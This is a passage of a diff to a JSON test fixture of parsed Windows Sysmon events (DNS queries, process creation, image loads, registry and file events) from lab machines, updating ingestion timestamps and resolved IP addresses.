Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:39:03.685690200Z'/\u003e\u003cEventRecordID\u003e220\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:39:02.752\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-b1a2-5d2f-0000-00106aca0000}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e844\u003c/Data\u003e\u003cData Name='QueryName'\u003etsfe.trafficshaping.dsp.mp.microsoft.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 tsfe.trafficmanager.net;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Windows\\System32\\svchost.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:39:03.685Z", @@ -20939,7 +20667,7 @@ ] }, "event": { - "ingested": "2021-10-14T04:10:32.313992119Z", + "ingested": "2021-12-09T13:49:44.740099700Z", "code": "22", "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:39:22.432153100Z'/\u003e\u003cEventRecordID\u003e221\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:39:20.413\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-b1a2-5d2f-0000-00106aca0000}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e844\u003c/Data\u003e\u003cData Name='QueryName'\u003eisatap.local.crowbird.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e9003\u003c/Data\u003e\u003cData Name='QueryResults'\u003e\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Windows\\System32\\svchost.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", @@ -21010,7 +20738,7 @@ ] }, "event": { - "ingested": "2021-10-14T04:10:32.313993492Z", + "ingested": "2021-12-09T13:49:44.740104800Z", "code": "22", "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:39:42.554539300Z'/\u003e\u003cEventRecordID\u003e230\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:39:40.504\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e9f7-5d2f-0000-001031039c00}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e676\u003c/Data\u003e\u003cData Name='QueryName'\u003epuppet\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e9003\u003c/Data\u003e\u003cData Name='QueryResults'\u003e\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files\\Puppet Labs\\Puppet\\sys\\ruby\\bin\\ruby.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", @@ -21081,7 +20809,7 @@ ] }, "event": { - "ingested": "2021-10-14T04:10:32.313994793Z", + "ingested": "2021-12-09T13:49:44.740109600Z", "code": "22", "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:40:42.447293700Z'/\u003e\u003cEventRecordID\u003e231\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:40:40.433\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-b1a2-5d2f-0000-001016f70000}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e636\u003c/Data\u003e\u003cData Name='QueryName'\u003ewpad\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e9003\u003c/Data\u003e\u003cData Name='QueryResults'\u003e\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Windows\\System32\\svchost.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", @@ -21155,12 +20883,12 @@ "type": "CNAME" }, { - "data": "65.55.44.109", + "data": "89.160.20.156", "type": "A" } ], "resolved_ip": [ - "65.55.44.109" + "89.160.20.156" ] }, "network": { @@ -21178,13 +20906,13 @@ "v10.vortex-win.data.microsoft.com" ], "ip": [ - "65.55.44.109" + "89.160.20.156" ] }, "event": { - "ingested": "2021-10-14T04:10:32.313996155Z", + "ingested": "2021-12-09T13:49:44.740113400Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:42:55.556826000Z'/\u003e\u003cEventRecordID\u003e232\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:42:54.033\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-b1a3-5d2f-0000-00102f440100}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e1788\u003c/Data\u003e\u003cData Name='QueryName'\u003ev10.vortex-win.data.microsoft.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 v10-win.vortex.data.microsoft.com.akadns.net;type: 5 geo.vortex.data.microsoft.com.akadns.net;type: 5 bn2.vortex.data.microsoft.com.akadns.net;::ffff:65.55.44.109;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Windows\\System32\\svchost.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:42:55.556826000Z'/\u003e\u003cEventRecordID\u003e232\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:42:54.033\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-b1a3-5d2f-0000-00102f440100}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e1788\u003c/Data\u003e\u003cData Name='QueryName'\u003ev10.vortex-win.data.microsoft.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 v10-win.vortex.data.microsoft.com.akadns.net;type: 5 geo.vortex.data.microsoft.com.akadns.net;type: 5 bn2.vortex.data.microsoft.com.akadns.net;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Windows\\System32\\svchost.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:42:55.556Z", @@ -21248,12 +20976,12 @@ "type": "CNAME" }, { - "data": "20.36.218.63", + "data": "89.160.20.156", "type": "A" } ], "resolved_ip": [ - "20.36.218.63" + "89.160.20.156" ] }, "network": { @@ -21269,13 +20997,13 @@ "settings-win.data.microsoft.com" ], "ip": [ - "20.36.218.63" + "89.160.20.156" ] }, "event": { - "ingested": "2021-10-14T04:10:32.313997422Z", + "ingested": "2021-12-09T13:49:44.740118100Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:43:06.459986800Z'/\u003e\u003cEventRecordID\u003e233\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:43:04.400\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-b1a3-5d2f-0000-00102f440100}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e1788\u003c/Data\u003e\u003cData Name='QueryName'\u003esettings-win.data.microsoft.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 settingsfd-geo.trafficmanager.net;::ffff:20.36.218.63;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Windows\\System32\\svchost.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:43:06.459986800Z'/\u003e\u003cEventRecordID\u003e233\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:43:04.400\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-b1a3-5d2f-0000-00102f440100}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e1788\u003c/Data\u003e\u003cData Name='QueryName'\u003esettings-win.data.microsoft.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 settingsfd-geo.trafficmanager.net;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Windows\\System32\\svchost.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:43:06.459Z", @@ -21371,7 +21099,7 @@ "level": "information" }, "event": { - "ingested": "2021-10-14T04:10:32.313998691Z", + "ingested": "2021-12-09T13:49:44.740122Z", "code": "1", "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e1\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e1\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2020-10-27T20:00:14.324234100Z'/\u003e\u003cEventRecordID\u003e20\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='7144' ThreadID='6876'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e-\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2020-10-27 20:00:14.320\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{9f32b55f-7c4e-5f98-5803-000000000500}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e3616\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Windows\\System32\\notepad.exe\u003c/Data\u003e\u003cData Name='FileVersion'\u003e10.0.17763.475 (WinBuild.160101.0800)\u003c/Data\u003e\u003cData Name='Description'\u003eNotepad\u003c/Data\u003e\u003cData Name='Product'\u003eMicrosoft« Windows« Operating System\u003c/Data\u003e\u003cData Name='Company'\u003eMicrosoft Corporation\u003c/Data\u003e\u003cData Name='OriginalFileName'\u003eNOTEPAD.EXE\u003c/Data\u003e\u003cData Name='CommandLine'\u003e\"C:\\Windows\\system32\\notepad.exe\" \u003c/Data\u003e\u003cData Name='CurrentDirectory'\u003eC:\\Users\\vagrant\\\u003c/Data\u003e\u003cData Name='User'\u003eVAGRANT\\vagrant\u003c/Data\u003e\u003cData Name='LogonGuid'\u003e{9f32b55f-6fdd-5f98-e7c9-020000000000}\u003c/Data\u003e\u003cData Name='LogonId'\u003e0x2c9e7\u003c/Data\u003e\u003cData Name='TerminalSessionId'\u003e1\u003c/Data\u003e\u003cData Name='IntegrityLevel'\u003eMedium\u003c/Data\u003e\u003cData Name='Hashes'\u003eSHA1=B6D237154F2E528F0B503B58B025862D66B02B73\u003c/Data\u003e\u003cData Name='ParentProcessGuid'\u003e{9f32b55f-6fdf-5f98-7000-000000000500}\u003c/Data\u003e\u003cData Name='ParentProcessId'\u003e4212\u003c/Data\u003e\u003cData Name='ParentImage'\u003eC:\\Windows\\explorer.exe\u003c/Data\u003e\u003cData Name='ParentCommandLine'\u003eC:\\Windows\\Explorer.EXE\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", @@ -21427,7 +21155,7 @@ "name": "DESKTOP-I9CQVAQ" }, "event": { - "ingested": "2021-10-14T04:10:32.314000020Z", + "ingested": "2021-12-09T13:49:44.740125600Z", "code": "25", "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e25\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e25\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2021-02-25T14:43:23.551269400Z'/\u003e\u003cEventRecordID\u003e10737797\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='3800' ThreadID='5080'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003eDESKTOP-I9CQVAQ\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e-\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2021-02-25 14:43:23.550\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{9497d8d9-b78b-6037-6f13-000000001000}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2628\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files\\Git\\mingw64\\libexec\\git-core\\git.exe\u003c/Data\u003e\u003cData Name='Type'\u003eImage is replaced\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", @@ -21501,7 +21229,7 @@ ] }, "event": { - "ingested": "2021-10-14T04:10:32.314001312Z", + "ingested": "2021-12-09T13:49:44.740129600Z", "code": "23", "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e23\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e23\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2020-05-12T06:48:27.084044200Z'/\u003e\u003cEventRecordID\u003e2243\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='1188' ThreadID='1600'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2012-r2\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e-\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2020-05-12 06:48:27.084\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{42f11c3b-4664-5eba-91ae-000000000000}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e820\u003c/Data\u003e\u003cData Name='User'\u003eNT AUTHORITY\\SYSTEM\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Windows\\system32\\svchost.exe\u003c/Data\u003e\u003cData Name='TargetFilename'\u003eC:\\Windows\\System32\\LogFiles\\Scm\\8b34f644-f627-47e7-98e0-957ba1c5eb6d\u003c/Data\u003e\u003cData Name='Hashes'\u003eMD5=5A9BDDF83BE530B481F0FD24DB28A6FF,IMPHASH=00000000000000000000000000000000\u003c/Data\u003e\u003cData Name='IsExecutable'\u003efalse\u003c/Data\u003e\u003cData Name='Archived'\u003etrue\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", @@ -21595,7 +21323,7 @@ "level": "information" }, "event": { - "ingested": "2021-10-14T04:10:32.314002566Z", + "ingested": "2021-12-09T13:49:44.740132900Z", "code": "7", "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e7\u003c/EventID\u003e\u003cVersion\u003e3\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e7\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2020-10-28T02:39:26.388325200Z'/\u003e\u003cEventRecordID\u003e10685\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='1676' ThreadID='4796'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e-\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2020-10-28 02:39:26.374\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{9f32b55f-d9de-5f98-f006-000000000600}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e5184\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Windows\\System32\\dllhost.exe\u003c/Data\u003e\u003cData Name='ImageLoaded'\u003eC:\\Windows\\System32\\IDStore.dll\u003c/Data\u003e\u003cData Name='FileVersion'\u003e10.0.17763.1 (WinBuild.160101.0800)\u003c/Data\u003e\u003cData Name='Description'\u003eIdentity Store\u003c/Data\u003e\u003cData Name='Product'\u003eMicrosoft« Windows« Operating System\u003c/Data\u003e\u003cData Name='Company'\u003eMicrosoft Corporation\u003c/Data\u003e\u003cData Name='OriginalFileName'\u003eIdStore.dll\u003c/Data\u003e\u003cData Name='Hashes'\u003eSHA1=9955A1C071C44A7CEECC0D928A9CFB7F64CC3F93,MD5=C7C45610F644906E6F7D664EF2E45B08,SHA256=4808F1101F4E42387D8DDB7A355668BAE3BF6F781C42D3BCD82E23446B1DEB3E,IMPHASH=194F3797B52231028C718B6D776C6853\u003c/Data\u003e\u003cData Name='Signed'\u003etrue\u003c/Data\u003e\u003cData Name='Signature'\u003eMicrosoft Windows\u003c/Data\u003e\u003cData Name='SignatureStatus'\u003eValid\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", @@ -21655,7 +21383,7 @@ "level": "information" }, "event": { - "ingested": "2021-10-14T04:10:32.314003830Z", + "ingested": "2021-12-09T13:49:44.740137300Z", "code": "13", "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e13\u003c/EventID\u003e\u003cVersion\u003e2\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e13\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2020-05-05T14:57:46.818869100Z'/\u003e\u003cEventRecordID\u003e2691\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='5496' ThreadID='876'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e-\u003c/Data\u003e\u003cData Name='EventType'\u003eSetValue\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2020-05-05 14:57:46.808\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{5b522f6e-7554-5eb1-6d00-000000000800}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e4320\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Windows\\Explorer.EXE\u003c/Data\u003e\u003cData Name='TargetObject'\u003eHKU\\S-1-5-21-1067164964-2079179834-2367582738-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\UserAssist\\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\\Count\\HRZR_PGYFRFFVBA\u003c/Data\u003e\u003cData Name='Details'\u003eBinary Data\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", @@ -21727,7 +21455,7 @@ "name": "DESKTOP-I9CQVAQ" }, "event": { - "ingested": "2021-10-14T04:10:32.314005139Z", + "ingested": "2021-12-09T13:49:44.740143400Z", "code": "24", "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e24\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e24\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2021-02-25T15:04:48.607343500Z'/\u003e\u003cEventRecordID\u003e10757412\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='3800' ThreadID='6444'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003eDESKTOP-I9CQVAQ\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e-\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2021-02-25 15:04:48.592\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{9497d8d9-aa1b-602f-a600-000000001000}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2144\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe\u003c/Data\u003e\u003cData Name='Session'\u003e1\u003c/Data\u003e\u003cData Name='ClientInfo'\u003euser: DESKTOP-I9CQVAQ\\luks\u003c/Data\u003e\u003cData Name='Hashes'\u003eSHA256=7ADB1CF1A75973079C055F929573AE92557A8C0E5B0E38A6A5427E412FB73D59,IMPHASH=00000000000000000000000000000000\u003c/Data\u003e\u003cData Name='Archived'\u003etrue\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", @@ -21785,7 +21513,7 @@ "level": "information" }, "event": { - "ingested": "2021-10-14T04:10:32.314006427Z", + "ingested": "2021-12-09T13:49:44.740149300Z", "code": "2", "original": 